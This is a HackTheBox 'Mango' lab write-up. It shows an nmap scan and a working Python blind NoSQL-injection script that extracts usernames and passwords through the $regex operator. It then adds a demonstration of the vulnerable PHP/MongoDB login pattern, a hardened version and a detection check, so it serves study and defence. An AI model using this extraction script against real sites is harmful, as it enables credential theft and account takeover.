
HackTheBox-Mango - ssooking

source link: https://ssooking.github.io/2020/07/hackthebox-mango/

An nmap scan of the common ports shows that 22, 80 and 443 are open.

# nmap -T4 -sS -sV -sC 10.10.10.162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 01:51 EST
Nmap scan report for 10.10.10.162
Host is up (0.25s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.07 seconds

In nmap's output for port 443 the certificate names staging-order.mango.htb; after adding it to /etc/hosts we can browse to that virtual host.

NoSQL injection script (blind, character-by-character extraction via the `$regex` operator):

#!/usr/bin/env python

import requests
import string

url = "http://staging-order.mango.htb/index.php"
headers = {"Host": "staging-order.mango.htb"}
cookies = {"PHPSESSID": "icc5dp0dufeh68mctc9dlne8jd"}

# Candidate characters; punctuation and whitespace are backslash-escaped so the
# regex matches them literally rather than as metacharacters.
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\" + c for c in string.punctuation + string.whitespace]


def get_usernames():
    """Enumerate usernames: a 302 redirect means the regex matched a document."""
    usernames = []
    params = {
        "username[$regex]": "",
        "password[$regex]": ".*",
        "login": "login"
    }

    for c in possible_chars:
        username = "^" + c
        params["username[$regex]"] = username + ".*"

        pr = requests.post(url,
            data=params,
            headers=headers,
            cookies=cookies,
            allow_redirects=False
        )

        if int(pr.status_code) == 302:
            print("Found username starting with " + c)
            while True:
                for c2 in possible_chars:
                    params["username[$regex]"] = username + c2 + ".*"
                    if int(requests.post(url, data=params, headers=headers, cookies=cookies, allow_redirects=False).status_code) == 302:
                        username += c2
                        print(username)
                        break
                # No candidate extended the prefix: the username is complete.
                if c2 == possible_chars[-1]:
                    found = username[1:].replace("\\", "")
                    print("Found username: " + found)
                    usernames.append(found)
                    break
    return usernames


def get_password(username):
    """Extract the password for a known username one character at a time."""
    print("Extracting password of " + username)
    params = {
        "username": username,
        "password[$regex]": "",
        "login": "login"
    }
    password = "^"
    while True:
        for c in possible_chars:
            params["password[$regex]"] = password + c + ".*"
            pr = requests.post(url,
                data=params,
                headers=headers,
                cookies=cookies,
                allow_redirects=False)
            if int(pr.status_code) == 302:
                password += c
                break
        # No candidate extended the prefix: the password is complete.
        if c == possible_chars[-1]:
            print("Found password " + password[1:].replace("\\", "") + " for username " + username)
            return password[1:].replace("\\", "")


# The driver loop must come after both functions are defined.
if __name__ == "__main__":
    for u in get_usernames():
        get_password(u)
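The script above works because PHP turns a form field named `username[$regex]` into a nested array, and passing that array straight into a MongoDB filter hands the attacker a query operator. The following is an added example, not code from the writeup or from the box itself: it emulates PHP's form parsing in Python, runs the resulting filter against a small constructed user list through a toy matcher (equality, `$eq` and `$regex` only), and shows the vulnerable login check beside a hardened one that rejects non-scalar fields and wraps values in `$eq`. The user records, field names and `INJECTED_BODY` are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample documents; not the box's real users.
USERS = [
    {"username": "admin", "password": "s3cr3t-example"},
    {"username": "mango", "password": "another-example"},
]

# A request body of the shape the script above sends (constructed).
INJECTED_BODY = "username[$regex]=^a.*&password[$regex]=.*&login=login"


def php_parse_form(body):
    """Emulate PHP's form parsing: `name[key]=v` becomes a nested array.

    This is the step that turns `username[$regex]` into
    {'username': {'$regex': ...}} before the application ever sees it.
    """
    parsed = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[\]]+)\[([^\[\]]*)\]", key)
        if m:
            parsed.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            parsed[key] = value
    return parsed


def doc_matches(doc, query):
    """Toy emulation of MongoDB matching: equality, $eq and $regex only."""
    for field, cond in query.items():
        value = doc.get(field)
        if isinstance(cond, dict):
            if "$eq" in cond and value != cond["$eq"]:
                return False
            if "$regex" in cond and not re.search(cond["$regex"], str(value)):
                return False
        elif value != cond:
            return False
    return True


def login_unsafe(form):
    """Vulnerable pattern: whatever PHP parsed is used directly as the filter."""
    query = {"username": form.get("username"), "password": form.get("password")}
    return any(doc_matches(u, query) for u in USERS)


def login_safe(form):
    """Hardened pattern: require plain strings and compare with $eq so that
    even a value containing '$' is treated as data, never as an operator."""
    username, password = form.get("username"), form.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("login fields must be plain strings")
    query = {"username": {"$eq": username}, "password": {"$eq": password}}
    return any(doc_matches(u, query) for u in USERS)


def find_operator_keys(form):
    """Detection helper: list form fields that smuggle a '$'-prefixed operator.

    Useful as a WAF or application-log rule: a legitimate login form never
    submits `username[$regex]` or similar.
    """
    hits = []
    for field, value in form.items():
        if isinstance(value, dict):
            hits.extend(f"{field}[{k}]" for k in value if k.startswith("$"))
    return hits


def safe_login_rejects(form):
    """True if the hardened check refuses the form outright."""
    try:
        login_safe(form)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    form = php_parse_form(INJECTED_BODY)
    print("parsed form:", form)
    print("operator keys:", find_operator_keys(form))
    print("unsafe login accepts injection:", login_unsafe(form))
    print("safe login rejects injection:", safe_login_rejects(form))
```

The same idea applies on the real PHP side: cast each login field with `(string)` (or reject it when `is_array()` is true) before it reaches the driver, and build the filter with `['username' => ['$eq' => $username]]`. The `find_operator_keys` check doubles as a detection signature, since the script above cannot avoid sending `[$regex]` in its field names.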

NoSQL Injection

https://mp.weixin.qq.com/s/ffHB9ZKWrUQuipWGPD0H5w
